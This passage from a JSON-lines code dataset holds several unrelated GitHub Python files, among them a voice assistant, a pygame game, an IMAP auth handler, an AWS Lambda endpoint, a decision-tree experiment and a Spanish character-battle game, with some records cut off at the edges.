service: {e}\"\n\n# Function to generate a text-based response\ndef get_response(user_input):\n user_input = user_input.lower()\n\n if \"hello\" in user_input:\n return \"Hello! How can I assist you?\"\n elif \"how are you\" in user_input:\n return \"I'm just a text-based assistant, but I'm here to help.\"\n elif \"bye\" in user_input:\n return \"Goodbye! Have a great day!\"\n elif \"time\" in user_input:\n current_time = datetime.datetime.now().strftime(\"%H:%M:%S\")\n return f\"The current time is {current_time}.\"\n elif \"search\" in user_input:\n # Extract the search query from the user input\n query = user_input.replace(\"search\", \"\").strip()\n if query:\n search_results = perform_search(query)\n return search_results\n else:\n return \"Please provide a search query.\"\n elif \"guide to\" in user_input:\n place_name = user_input.replace(\"guide to\", \"\").strip()\n if place_name:\n guide = get_guide_to_place(place_name)\n return guide\n else:\n return \"Please specify a place for the guide.\"\n else:\n return \"I'm a simple text-based assistant. 
How can I assist you?\"\n\n# Function to perform a web search and return search results\ndef perform_search(query):\n    search_url = f\"https://www.google.com/search?q={query}\"\n    \n    try:\n        response = requests.get(search_url)\n        response.raise_for_status()\n        soup = BeautifulSoup(response.text, 'html.parser')\n        search_results = soup.find_all(\"div\", class_=\"tF2Cxc\")\n        if search_results:\n            return search_results[0].get_text()\n        else:\n            return \"No search results found.\"\n    except requests.exceptions.RequestException as e:\n        return f\"Error performing the search: {e}\"\n\n# Function to get a guide to a place using Google Maps API\ndef get_guide_to_place(place_name):\n    try:\n        # Perform a geocode request to get the place details\n        geocode_result = gmaps.geocode(place_name)\n\n        if geocode_result:\n            place_details = geocode_result[0]\n            formatted_address = place_details.get(\"formatted_address\", \"Address not found.\")\n            place_type = place_details.get(\"types\", [])\n            place_type_str = \", \".join(place_type)\n            \n            return f\"Here's a guide to {place_name}:\\nType: {place_type_str}\\nAddress: {formatted_address}\"\n        else:\n            return \"Place not found.\"\n    except googlemaps.exceptions.ApiError as e:\n        return f\"Error getting place details: {e}\"\n\n# Main loop for voice interaction\nwhile True:\n    user_input = get_voice_input()\n    print(\"You said:\", user_input)\n\n    response = get_response(user_input)\n    print(\"Assistant:\", response)\n\n    if \"exit\" in user_input.lower():\n        break\n\n# End the program\nprint(\"Assistant: Goodbye!\")\n","repo_name":"RafikEmad/EmbeddedLinux","sub_path":"01_Python/04_Advanced/Task5_GoogleAssistant/GoogleAssistant.py","file_name":"GoogleAssistant.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"8442679676","text":"import os, sys\nimport csv\nimport json\n# import geojson\n\n\n\n\n\ndef save_csv(data, fileName):\n    \"\"\" data: list of dictionaries\n        fileName: filePath//fileName.fileType\"\"\"\n    # was: open(fn, ...) and 'for rw in save_data' -- both names are undefined in this scope\n    with open(fileName, 'w', newline='') as fw:\n        csvwriter = csv.writer(fw)\n        csvwriter.writerow(data[0].keys())\n        for rw in data:\n            csvwriter.writerow(rw.values())\n\ndef save_json(data, fileName):\n    \"\"\" data: list of dictionaries (already a json object)\n        fileName: filePath//fileName.fileType\"\"\"\n    # was: open(fn, ...) -- 'fn' is undefined in this scope\n    with open(fileName, 'w') as fw:\n        json.dump(data, fw, indent=4)\n\n\n# def save_geojson(data, fileName):\n#     \"\"\" data: list of dictionaries\n#         fileName: filePath//fileName.fileType\"\"\"\n\n#     # if data is a list of dictionaries, we need to reformat\n#     # into geojson data, using any columns in the file that look like Lat/Lon pairs\n\n#     # if data is a dictionary, with first term: {'type': \"FeatureCollection\"}\n#     # save directly to geojson, no restructuring necessary\n    \n#     with open(fn, 'w') as fw:\n#         geojson.dump(data, fw, indent=4)\n\n\n","repo_name":"blcrosbie/ee_s5p_plugin","sub_path":"ee_s5p_plugin/scripts/file_handler.py","file_name":"file_handler.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"24393475829","text":"import pygame\r\nfrom settings import *\r\nfrom tiles import Tile\r\nfrom level import Level\r\nfrom sys import exit\r\nfrom player import Player\r\nfrom game_data import level_0\r\nclock = pygame.time.Clock()\r\n# init\r\n# kill_player == 0 while the player is alive; kill_player == 1 while the player is dying\r\n\r\nclass Game():\r\n    def __init__(self,joystick):\r\n#        super().__init__()\r\n        
self.joystick=joystick\r\n        #screen\r\n        infoObject = pygame.display.Info()\r\n        screen_width=infoObject.current_w\r\n        screen_height=infoObject.current_h\r\n        self.screen=pygame.display.set_mode((screen_height,screen_width),pygame.FULLSCREEN)\r\n        self.clock=pygame.time.Clock()\r\n        #level\r\n        self.level=Level(level_0,self.screen)\r\n        #background\r\n        pygame.display.set_caption('test game')\r\n        self.sky_surface = pygame.image.load('graphics/sky.jpg').convert_alpha()\r\n        #fonts\r\n        self.def_font=pygame.font.Font(None,50)#default font\r\n\r\n        self.running=True\r\n\r\n    def run(self,death_count):\r\n        quit_game = False\r\n        game_over = False\r\n\r\n        self.text_name = self.def_font.render(\"Deathcount \" + str(death_count), True, \"red\")\r\n        while not quit_game and not game_over:\r\n\r\n            for event in pygame.event.get():\r\n                if event.type == pygame.QUIT:\r\n                    pygame.quit()\r\n                    exit()\r\n                if event.type == pygame.KEYDOWN:\r\n                    if event.key == pygame.K_ESCAPE:\r\n                        print(\"escape pressed\")\r\n                        quit_game = True\r\n                        pygame.quit()\r\n                        exit()\r\n                    if event.key == pygame.K_r:\r\n                        game_over = True\r\n                if joystick: # check if the joystick was initialized\r\n                    if pygame.joystick.get_count() > 0: # if there's a pad\r\n                        button_exit = self.joystick.get_button(7)\r\n                        if button_exit > 0:\r\n                            print(\"escape pressed on pad\")\r\n                            quit_game = True\r\n                            pygame.quit()\r\n                            exit()\r\n\r\n\r\n            self.screen.blit(self.sky_surface,(0,0))\r\n            self.level.run(self.joystick)\r\n            self.screen.blit(self.text_name,(940,50))\r\n\r\n\r\n            kill_player=self.level.death(0)\r\n            #print(kill_player)\r\n            if kill_player==1:\r\n\r\n                self.level = Level(level_0, self.screen)\r\n                self.run(death_count)\r\n            pygame.display.update()\r\n            #print(death_count)\r\n\r\n\r\n            self.clock.tick(60)\r\n            #print(self.clock.get_fps())\r\n        return quit_game\r\n\r\nif __name__ == \"__main__\":\r\n    pygame.init()\r\n    # pad initialization\r\n    joystick = None\r\n    if joystick:\r\n        print(\"joystick package is here\")\r\n        if pygame.joystick.get_count() > 0:\r\n            joystick = pygame.joystick.Joystick(0)\r\n            joystick.init()\r\n            print(\"joystick initialized\")\r\n        else:\r\n            joystick = False # look at get_input in player class\r\n            print('joystick not initialized')\r\n    quit_game=False\r\n    death_count = 0\r\n    while not quit_game:\r\n        game = Game(joystick)\r\n        game.run(death_count)\r\n        death_count += 1\r\n","repo_name":"wolf3213/The-limit","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"24075235309","text":"'''\r\nSTAGE 3\r\nno max distance\r\nno closest node check\r\nno tree like structure\r\n'''\r\nimport matplotlib.pyplot as plt\r\n# import shapely\r\nfrom shapely.geometry import LineString\r\nfrom shapely.geometry import Polygon\r\n# from shapely.geometry import MultiPolygon as mpg\r\nfrom shapely.geometry import Point\r\nimport random\r\n\r\nclass Node:\r\n    # for parent node\r\n    parent = None\r\n    # for new random node\r\n    newNode = None\r\n    # for position\r\n    position = None\r\n    # accepts parent node and new random node of type Point\r\n    def __init__(self, parent, newNode, position):\r\n        self.parent = parent\r\n        self.newNode = newNode\r\n        self.position = position\r\n\r\n        # parent is a node\r\n        # newNode = Node()\r\n        # position and parent attribs\r\n        # Parent = Node()\r\n        # newNode.parent = newNode\r\n        # using the object of the next Point\r\n        # pass\r\n\r\n# function to return True if new Node isn't present in any obstacle,\r\n# else False\r\ndef 
isNodeOkay(newNode):\r\n isOkay = True\r\n for obs in obsList:\r\n if newNode.within(obs):\r\n isOkay = False\r\n # print('Node is Not Okay')\r\n return isOkay\r\n return isOkay\r\n\r\n# function to check if line crosses another Obstacle\r\n# returns true if no cross\r\ndef isLineOkay(newLine):\r\n isOkay = True\r\n for obs in obsList:\r\n if newLine.crosses(obs):\r\n isOkay = False\r\n # print('Line is Not Okay')\r\n return isOkay\r\n return isOkay\r\n\r\ndef plotter(path):\r\n pass\r\n\r\n# sample goal after x interval\r\ndef goalSampler(itr):\r\n pass\r\n\r\n# function to repeat procedure 5 times\r\n'''\r\nPROCEDURE:\r\n choosing random point in given range\r\n\r\n convert point into node using class, pass parent and new node\r\n checking if it lies inside given obstacle list\r\n checking if line crosses any obstacle\r\n adding it to path\r\n traversing to start of \r\n plotting path\r\n'''\r\ndef driver(n, start, goal, d):\r\n plt.scatter(start.x, start.y, marker='x', color='yellow')\r\n plt.scatter(goal.x, goal.y, marker='x', color='green')\r\n # parent = Node()\r\n # newnode = Node(parent);\r\n\r\n path = []\r\n path.append(start)\r\n # node to calculate distance\r\n prev = start\r\n # keep track of number of nodes placed\r\n nodeCtr=0\r\n itr=0\r\n goalSampleCtr = 0\r\n while nodeCtr %f' % (\n (norm_key, task.name), svm_dct['task_error']))\n\n dct = self._results['retrain_classifier_image_match_indexed']\n dct.setdefault(norm_key, {})\n if task.name in dct[norm_key]:\n warn('Overwriting retrain_classifier_image_match_indexed result: %s'\n % task.name)\n dct[norm_key][task.name] = svm_dct\n return svm_dct\n\n def loss_image_match_indexed(self, svm_dct, task):\n norm_task = svm_dct['norm_task']\n norm_key = svm_dct['norm_key']\n\n info('loss_image_match_indexed: %s, %s' % (norm_key, task.name) )\n x = self.normalized_image_match_features(task, svm_dct, 'test',\n # -- assume that slow features were caught earlier\n batched_lmap_speed_thresh={'seconds': 30, 'elements': 1},\n )\n svm_dct['ens'].add_sample(task.name, task.y)\n svm_dct['ens'].add_features(norm_key, task.name, x)\n\n self.load_ensemble_grams(norm_task, svm_dct['ens'], task.name,\n svm_dct['ens'].train_sample)\n svm_dct['ens'].compute_gram(norm_key, task.name,\n svm_dct['ens'].train_sample, dtype='float32')\n\n preds = svm_dct['ens'].predict(task.name)\n erate = error_rate(preds, task.y)\n info('test_image_match_indexed error_rate %s -> %f' % (\n task.name, erate))\n\n # -- add summary information to self._results\n dct = self._results['loss_image_match_indexed']\n dct.setdefault(norm_key, {})\n if task.name in dct[norm_key]:\n warn('Overwriting loss_image_match_indexed result: %s'\n % task.name)\n dct[norm_key][task.name] = {\n 'error_rate': erate,\n 'norm_key': norm_key,\n 'task_name': task.name,\n 'preds_01': ''.join(\n ['0' if p == -1 else '1' for p in preds]),\n }\n return erate\n\n","repo_name":"hyperopt/hyperopt-convnet","sub_path":"hpconvnet/slm_visitor_esvc.py","file_name":"slm_visitor_esvc.py","file_ext":"py","file_size_in_byte":16738,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"67"} +{"seq_id":"30443140569","text":"import datetime\nimport getpass\nfrom imapclient import IMAPClient\nfrom socket import gaierror, error as socket_error\nfrom ssl import SSLError\n\nimport sqlalchemy.orm.exc\n\nfrom inbox.log import get_logger\nlog = get_logger()\n\nfrom inbox.auth.base import AuthHandler\nimport inbox.auth.starttls\nfrom inbox.basicauth import (ConnectionError, 
ValidationError,\n TransientConnectionError,\n UserRecoverableConfigError)\nfrom inbox.models import Namespace\nfrom inbox.models.backends.generic import GenericAccount\nfrom inbox.providers import provider_info\n\n\nPROVIDER = 'generic'\nAUTH_HANDLER_CLS = 'GenericAuthHandler'\n\n\nclass GenericAuthHandler(AuthHandler):\n def create_account(self, db_session, email_address, response):\n try:\n account = db_session.query(GenericAccount).filter_by(\n email_address=email_address).one()\n except sqlalchemy.orm.exc.NoResultFound:\n namespace = Namespace()\n account = GenericAccount(namespace=namespace)\n\n account.email_address = response['email']\n account.password = response['password']\n account.date = datetime.datetime.utcnow()\n\n provider_name = self.provider_name\n account.provider = provider_name\n if provider_name == 'custom':\n account.imap_endpoint = (response['imap_server_host'],\n response['imap_server_port'])\n account.smtp_endpoint = (response['smtp_server_host'],\n response['smtp_server_port'])\n\n # Ensure account has sync enabled after authing.\n account.enable_sync()\n\n return account\n\n def connect_account(self, email, credential, imap_endpoint,\n account_id=None):\n \"\"\"Provide a connection to a generic IMAP account.\n\n Raises\n ------\n ConnectionError\n If we cannot connect to the IMAP host.\n TransientConnectionError\n Sometimes the server bails out on us. Retrying may\n fix things.\n ValidationError\n If the credentials are invalid.\n \"\"\"\n host, port = imap_endpoint\n try:\n conn = IMAPClient(host, port=port, use_uid=True, ssl=(port == 993))\n if port != 993:\n # Raises an exception if TLS can't be established\n conn._imap.starttls()\n except IMAPClient.AbortError as e:\n log.error('account_connect_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error=\"[ALERT] Can't connect to host - may be transient\")\n raise TransientConnectionError(str(e))\n except(IMAPClient.Error, gaierror, socket_error) as e:\n log.error('account_connect_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='[ALERT] (Failure): {0}'.format(str(e)))\n raise ConnectionError(str(e))\n\n try:\n conn.login(email, credential)\n except IMAPClient.AbortError as e:\n log.error('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error=\"[ALERT] Can't connect to host - may be transient\")\n raise TransientConnectionError(str(e))\n except IMAPClient.Error as e:\n # Providers like Yahoo sometimes throw harmless\n # invalid connection errors.\n error_msgs = provider_info(\n self.provider_name).get('transient_error_messages', [])\n\n if str(e) in error_msgs:\n log.warning('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='Transient auth error',\n transient_message=str(e))\n raise TransientConnectionError(str(e))\n else:\n log.error('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='[ALERT] Invalid credentials (Failure)')\n raise ValidationError(str(e))\n except SSLError as e:\n log.error('account_verify_failed',\n account_id=account_id,\n email=email,\n host=host,\n port=port,\n error='[ALERT] SSL Connection error (Failure)')\n raise ConnectionError(str(e))\n\n return conn\n\n def _supports_condstore(self, conn):\n \"\"\"Check if the connection supports CONDSTORE\n Returns\n -------\n True: If the account supports CONDSTORE\n False otherwise\n \"\"\"\n capabilities = conn.capabilities()\n if \"CONDSTORE\" in 
capabilities:\n return True\n\n return False\n\n def verify_account(self, account):\n \"\"\"Verifies a generic IMAP account by logging in and logging out.\n\n Note: Raises exceptions from connect_account() on error.\n\n Returns\n -------\n True: If the client can successfully connect.\n \"\"\"\n conn = self.connect_account(account.email_address,\n account.password,\n account.imap_endpoint)\n info = account.provider_info\n if \"condstore\" not in info:\n if self._supports_condstore(conn):\n account.supports_condstore = True\n try:\n conn.list_folders()\n except Exception as e:\n log.error(\"account_folder_list_failed\",\n email=account.email_address,\n account_id=account.id,\n error=e.message)\n raise UserRecoverableConfigError(\"Full IMAP support is not \"\n \"enabled for this account. \"\n \"Please contact your domain \"\n \"administrator and try again.\")\n finally:\n conn.logout()\n return True\n\n def interactive_auth(self, email_address):\n password_message = 'Password for {0} (hidden): '\n pw = ''\n while not pw:\n pw = getpass.getpass(password_message.format(email_address))\n\n response = dict(email=email_address, password=pw)\n\n if self.provider_name == 'custom':\n imap_server_host = raw_input('IMAP server host: ').strip()\n imap_server_port = raw_input('IMAP server port: ').strip() or 993\n smtp_server_host = raw_input('SMTP server host: ').strip()\n smtp_server_port = raw_input('SMTP server port: ').strip() or 587\n response.update(imap_server_host=imap_server_host,\n imap_server_port=imap_server_port,\n smtp_server_host=smtp_server_host,\n smtp_server_port=smtp_server_port)\n\n return response\n","repo_name":"PriviPK/privipk-sync-engine","sub_path":"inbox/auth/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":7451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71624032855","text":"import json, boto3, os\n\n\ndef create_user(data):\n try:\n table = boto3.resource('dynamodb').Table(os.getenv('users_table'))\n response = table.put_item(\n Item = {\n 'id': data['id'],\n 'email': data['email'],\n 'name': data['name'],\n 'phone': data['phone']\n }\n )\n return [True, response]\n \n except Exception as e:\n return [False, e]\n\n\ndef lambda_handler(event, context):\n if event['body'] is not None:\n body = json.loads(event['body'])\n \n else:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'Request body is missing.',\n }\n )\n }\n \n if 'id' not in body or 'email' not in body or 'name' not in body or 'phone' not in body:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'Id, email, name or phone is missing.',\n }\n )\n }\n \n if 'Item' not in boto3.resource('dynamodb').Table(os.getenv('users_table')).get_item(Key={'id': body['id']}):\n result = create_user(body)\n if result[0]:\n return {\n \"statusCode\": 201,\n \"body\": json.dumps(\n {\n 'Message': 'User created successfully.',\n }\n )\n }\n \n else:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'Something went wrong.',\n 'Exception': str(result[1]),\n }\n )\n }\n \n else:\n return {\n \"statusCode\": 400,\n \"body\": json.dumps(\n {\n 'Message': 'User already exists.',\n }\n )\n }\n","repo_name":"ma593y/aws-with-serverless-framework","sub_path":"aws-serverless-rest-apis/users_handlers/post_users.py","file_name":"post_users.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} 
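The generic-IMAP record that ends above centers on one connection idiom: treat port 993 as implicit SSL/TLS and fall back to STARTTLS on any other port, so credentials are never sent in the clear. A minimal, self-contained sketch of that pattern follows; the host, port, and credentials are placeholders, and the public `starttls()` call assumes a reasonably recent `imapclient` release (the record reaches into the private `conn._imap` handle because older releases lacked a public wrapper).

```python
from imapclient import IMAPClient

def open_imap(host, port, user, password):
    # Port 993 means implicit TLS; any other port gets STARTTLS after connecting.
    conn = IMAPClient(host, port=port, use_uid=True, ssl=(port == 993))
    if port != 993:
        conn.starttls()  # raises if the server cannot negotiate TLS
    conn.login(user, password)
    return conn

# Usage with placeholder values:
# conn = open_imap("imap.example.com", 143, "user@example.com", "secret")
# print(conn.list_folders())
# conn.logout()
```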
+{"seq_id":"35218068036","text":"import setuptools\nfrom pathlib import Path\n\n\nworkdir = Path(__file__).parent.absolute() / 'axDo/workdirs/dev'\nworkdir.mkdir(parents=True, exist_ok=True)\nworkdir = Path(__file__).parent.absolute() / 'axDo/results'\nworkdir.mkdir(parents=True, exist_ok=True)\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"EEG-Cluster\", # Replace with your own username\n version=\"0.1\",\n author=\"xavante\",\n author_email=\"xavante.erickson@gmail.com\",\n description=\"mvpa_package for Lund university\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n entry_points = {\n 'console_scripts': ['eray=SetupCluster:main'],\n },\n packages=setuptools.find_packages(exclude=[\"data\", \"documents\", \"Old\", \"Orchestration\", \"Plotting\", \"ReadableMatlab\"]),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"Operating System :: POSIX :: Linux\",\n ],\n python_requires='>=3.8.5',\n install_requires=[\n 'ray==1.2.0',\n 'scipy==1.6.1',\n 'scikit-learn==0.24.1',\n 'scikit-image==0.18.1',\n 'openstacksdk>=0.54.0',\n 'accelerator',\n ]\n)","repo_name":"Xavantex/masterthesiseeganalysis","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19296022737","text":"import random\nfrom tkinter.tix import Tree\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom get_data import get_data\nfrom models import DecisionTree, node_score_error, node_score_entropy, node_score_gini\n\n\ndef loss_plot(ax, title, tree, pruned_tree, train_data, test_data):\n '''\n Example plotting code. This plots four curves: the training and testing\n average loss using tree and pruned tree.\n You do not need to change this code!\n Arguments:\n - ax: A matplotlib Axes instance.\n - title: A title for the graph (string)\n - tree: An unpruned DecisionTree instance\n - pruned_tree: A pruned DecisionTree instance\n - train_data: Training dataset returned from get_data\n - test_data: Test dataset returned from get_data\n '''\n fontsize=8\n ax.plot(tree.loss_plot_vec(train_data), label='train non-pruned')\n ax.plot(tree.loss_plot_vec(test_data), label='test non-pruned')\n ax.plot(pruned_tree.loss_plot_vec(train_data), label='train pruned')\n ax.plot(pruned_tree.loss_plot_vec(test_data), label='test pruned')\n\n\n ax.locator_params(nbins=3)\n ax.set_xlabel('number of nodes', fontsize=fontsize)\n ax.set_ylabel('loss', fontsize=fontsize)\n ax.set_title(title, fontsize=fontsize)\n legend = ax.legend(loc='upper center', shadow=True, fontsize=fontsize-2)\n\ndef explore_dataset(filename, class_name):\n train_data, validation_data, test_data = get_data(filename, class_name)\n\n # TODO: Print 12 loss values associated with the dataset.\n # For each measure of gain (training error, entropy, gini):\n # (a) Print average training loss (not-pruned)\n # (b) Print average test loss (not-pruned)\n # (c) Print average training loss (pruned)\n # (d) Print average test loss (pruned)\n decision_tree_ent = DecisionTree(data=train_data, validation_data=None, gain_function=node_score_entropy)\n print(\"entropy non pruned train\", decision_tree_ent.loss(train_data)) # average training loss\n print(\"entropy non pruned test\", decision_tree_ent.loss(test_data))\n\n p_decision_tree_ent = DecisionTree(data=train_data, validation_data=validation_data, gain_function=node_score_entropy)\n 
print(\"entropy pruned train\", p_decision_tree_ent.loss(train_data)) # average training loss\n print(\"entropy pruned test\", p_decision_tree_ent.loss(test_data))\n\n decision_tree_train = DecisionTree(data=train_data, validation_data=None, gain_function=node_score_error)\n print(\"training error non pruned train\", decision_tree_train.loss(train_data)) # average training loss\n print(\"training error non pruned test\", decision_tree_train.loss(test_data))\n\n p_decision_tree_train = DecisionTree(data=train_data, validation_data=validation_data, gain_function=node_score_error)\n print(\"training error pruned train\", p_decision_tree_train.loss(train_data)) # average training loss\n print(\"training error pruned test\", p_decision_tree_train.loss(test_data))\n\n decision_tree_gini = DecisionTree(data=train_data, validation_data=None, gain_function=node_score_gini)\n print(\"gini non pruned train\", decision_tree_gini.loss(train_data)) # average training loss\n print(\"gini non pruned test\", decision_tree_gini.loss(test_data))\n\n p_decision_tree_gini = DecisionTree(data=train_data, validation_data=validation_data, gain_function=node_score_gini)\n print(\"gini pruned train\", p_decision_tree_gini.loss(train_data)) # average training loss\n print(\"gini pruned test\", p_decision_tree_gini.loss(test_data))\n\n\n # TODO: Feel free to print or plot anything you like here. Just comment\n # make sure to comment it out, or put it in a function that isn't called\n # by default when you hand in your code!\n # figure,axes = plt.subplots(1,3)\n\n # entropy_graph = loss_plot(axes[0],\"entropy gain\", decision_tree_ent, p_decision_tree_ent, train_data, test_data)\n # train_graph = loss_plot(axes[1],\"train error\", decision_tree_train, p_decision_tree_train, train_data, test_data)\n # gini_graph = loss_plot(axes[2],\"gini gain\", decision_tree_gini, p_decision_tree_gini, train_data, test_data)\n \n # # print(\"entropy\", decision_tree_ent[5],decision_tree_ent[10], \"train\", decision_tree_train[5], decision_tree_train[10], \"gini\", decision_tree_gini[5], decision_tree_gini[10])\n\n # plt.savefig(\"hw6_plots.png\")\n # plt.show()\n\n#for project report\ndef plot_loss(filename, class_name):\n train_data, validation_data, test_data = get_data(filename, class_name)\n # have to go through depths\n training_loss = []\n max_depths = list(range(1,16)) #values between 1 and 15\n \n #loop through values\n for x in range(1,16):\n decision_tree = DecisionTree(data=train_data,validation_data=None,gain_function=node_score_entropy, max_depth=x)\n training_loss.append(decision_tree.loss(train_data))\n \n plt.plot(max_depths,training_loss)\n plt.xlabel('max depth')\n plt.ylabel('training set loss')\n plt.title('maximum depth vs training loss')\n plt.show()\n\n\n\n\ndef main():\n ########### PLEASE DO NOT CHANGE THESE LINES OF CODE! 
###################\n    random.seed(1)\n    np.random.seed(1)\n    #########################################################################\n\n    explore_dataset('data/chess.csv', 'won')\n    explore_dataset('data/spam.csv', '1')\n\n    ## TESTING DEPTH ##\n    plot_loss('data/spam.csv', '1')\n\nmain()\n","repo_name":"avonderg/cs1420-boosting-trees","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"10777616118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 25 19:23:48 2019\n\n@author: adityapandey\n\"\"\"\nimport numpy as np\n\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \nimport tensorflow as tf\n\nARelu_k=1\nARelu_n=1\n\ndef set_kn(k, n):\n    global ARelu_k, ARelu_n\n    ARelu_k = k\n    ARelu_n = n\n\ndef ARelu(x):\n    global ARelu_k, ARelu_n\n    if x<=0:\n        return -0.01 * ARelu_k * np.power(abs(x), ARelu_n)\n    else: \n        return ARelu_k * np.power(x, ARelu_n)\n    \nnp_ARelu = np.vectorize(ARelu)\n\ndef d_ARelu(x):\n    global ARelu_k, ARelu_n\n    if x<=0:\n        return -0.01 * ARelu_n * ARelu_k * np.power(abs(x), ARelu_n)\n    else: \n        return ARelu_n * ARelu_k * np.power(x, ARelu_n-1)\n    \nnp_d_ARelu = np.vectorize(d_ARelu)\n\nnp_d_ARelu_32 = lambda x: np_d_ARelu(x).astype(np.float32)\n\ndef tf_d_ARelu(x, name=None):\n    with tf.name_scope(name, \"d_ARelu\", [x]) as name:\n        y = tf.py_func(np_d_ARelu_32,\n                       [x],\n                       [tf.float32],\n                       name=name,\n                       stateful=False)\n    return y[0]\n\ndef py_func(func, inp, Tout, stateful=True, name=None, grad=None):\n\n    # Need to generate a unique name to avoid duplicates:\n    rnd_name = 'PyFuncGrad' + str(np.random.randint(0, 1E+8))\n\n    tf.RegisterGradient(rnd_name)(grad)\n    g = tf.get_default_graph()\n    with g.gradient_override_map({\"PyFunc\": rnd_name}):\n        return tf.py_func(func, inp, Tout, stateful=stateful, name=name)\n    \ndef ARelugrad(op, grad):\n    x = op.inputs[0]\n    \n    n_gr = tf_d_ARelu(x)\n    return grad * n_gr\n\nnp_ARelu_32 = lambda x: np_ARelu(x).astype(np.float32)\n\ndef tf_ARelu(x, name=None):\n\n    with tf.name_scope(name, \"ARelu\", [x]) as name:\n        y = py_func(np_ARelu_32,\n                    [x],\n                    [tf.float32],\n                    name=name,\n                    grad=ARelugrad)\n    return y[0]\n    \n","repo_name":"adityapandey1998/Parabolic-Functions","sub_path":"A-ReLU/Leaky_AReLU.py","file_name":"Leaky_AReLU.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"9116546495","text":"from GemasGame import Personaje\nfrom Guerreros import Samurai\nfrom Guerreros import Bombardero\n# The class is the base template; it holds the attributes and the methods.\n\n# Properties - Attributes\n# These properties define the object.\n\n# Functions - Methods\n# The actions the object can perform.\n\n\n# We instantiate through the __init__ constructor\n# self,nombre,fuerza,inteligencia,defensa,vida\n\n# The good guys\n# Pogy = Personaje(\"Pogy\",10,1,5,100)\nHormy = Personaje(\"🐜 Hormy\",10,1,5,100)\n# The bad guys\nVillanoide = Personaje(\"🦔 TopoTron\",8,5,3,100)\nVillanoide.volar = True\n\nprint(\"Inicializamos nuestros personajes\")\nprint(Hormy.atributos())\nprint(Villanoide.atributos())\n\nHormy.fuerza = Hormy.fuerza + 2\nprint(f\"La fuerza de {Hormy.nombre} es de: \",Hormy.fuerza)\nprint(\"🔎 Revisar atributos:\")\nHormy.atributos()\nprint(\"⏫ Aqui subimos de nivel:\")\nHormy.subirNivel(3,0,0)\nHormy.atributos()\nprint(\"👽 Quitar la vida por completo:\")\n# Hormy.__gameover()\nprint(\"Validamos si esta vivo:\")\nprint(Hormy.validarVivo())\nHormy.atributos()\n\nprint(\"🐜😤 Antes del ataque\")\nVillanoide.atributos()\nprint(Hormy.damage(Villanoide))\nprint(\"⚔ Realizamos el ataque\")\nHormy.atacar(Villanoide)\nprint(\"🐜🤕 Despues del ataque\")\nVillanoide.atributos()\n\n\nprint(\"🦔😤 Antes del ataque\")\nHormy.atributos()\nprint(Hormy.damage(Villanoide))\nprint(\"⚔ Realizamos el ataque\")\nVillanoide.atacar(Hormy)\nprint(\"🦔🤕 Despues del ataque\")\nHormy.atributos()\n\n\n\n# Hormy.atributos()\n# Villanoide.atacar(Hormy)\n\nprint(\"💥Inicializamos una nueva batalla💥\")\n\ngoldenBor = Personaje(\"GolBor 🥞\",30,48,30,100)\nsenShin = Samurai(\"SenShin 🤖\",50,10,5,100,30)\nTerriBol = Bombardero(\"Terribol 🦏\",20,30,5,100,50)\n\nprint(\"Antes de atacar 🥳\")\ngoldenBor.atributos()\nsenShin.atributos()\nTerriBol.atributos()\n\n\ngoldenBor.atacar(TerriBol)\nsenShin.atacar(goldenBor)\nTerriBol.atacar(senShin)\n\nprint(\"Despues de atacar 💥\")\ngoldenBor.atributos()\nsenShin.atributos()\nTerriBol.atributos()\n\n\n# Bot vs. Bot\n\nBitBee = Samurai(\"BitBee 🐝\",20,10,4,1000,2)\nRockerTu = Bombardero(\"RockerTu 🐲\",5,15,4,1000,3)\n\ndef combate(player1,player2):\n    ronda = 0\n    while player1.validarVivo() and player2.validarVivo():\n        print(\"Ronda: \", ronda)\n        print(\"Accion de: \", player1.nombre)\n        player1.atacar(player2)\n        print(\"Accion de: \", player2.nombre)\n        player2.atacar(player1)\n        ronda = ronda + 1\n    if player1.validarVivo():\n        print(\"🏆 Ha ganado: \", player1.nombre)\n    elif player2.validarVivo():\n        print(\"🏆 Ha ganado: \", player2.nombre)\n    else:\n        # was a bare string literal, which has no effect; print the draw message instead\n        print(\"Hubo un empate 